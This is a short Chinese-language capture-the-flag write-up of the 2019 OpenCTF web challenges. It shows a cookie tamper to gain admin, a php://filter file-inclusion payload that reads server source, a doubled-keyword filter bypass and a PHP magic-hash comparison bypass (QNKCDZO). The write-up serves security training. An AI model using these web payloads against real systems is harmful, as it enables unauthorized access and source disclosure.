2019 Openctf Web WriteUp

i_love_cookie

id=guest,改成id=admin即可。

proxy

看到一个链接:

/index.php?url=http://naver.com

猜测是文件包含,可以读到admin.php

/index.php?url=php://filter/read=convert.base64-encode/resource=admin.php

<?php
    $flag = 'flag{basic_SSRF_XDDDDDDD}';
    if($_SERVER['REMOTE_ADDR'] === '127.0.0.1' || $_SERVER['REMOTE_ADDR'] === 'localhost' || $_SERVER['REMOTE_ADDR'] === '::1'){
        echo $flag;
    }
    else{
        echo 'hmm? you are not local ip';
    }

这题原意是ssrf吧。

easy_Web

看到一个id,尝试输入:id=admin
看到admin被过滤了。


双写:adadminmin
只剩下n,猜测admi也被过滤了。

构造:adadmiadminmin

magic

有个source.phps

<?php
$flag = "^^";
$user_hash = $_GET['GOGO'];
if(sha1("10932435112") == md5($user_hash)){
    echo "<h1>".$flag."</h1>";
}
else{
    echo "no... -_-;";
}
?>

看下sha1("10932435112")的结果:


所以只要找个md5值也为0exxx的值就可以了。
构造:

?GOGO=QNKCDZO

readme

看到file=1.jpg


有个任意文件读取:

题目没给flag,我自己放个在根目录下:

总结

入门题目,无聊玩玩。

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

友情链接更多精彩内容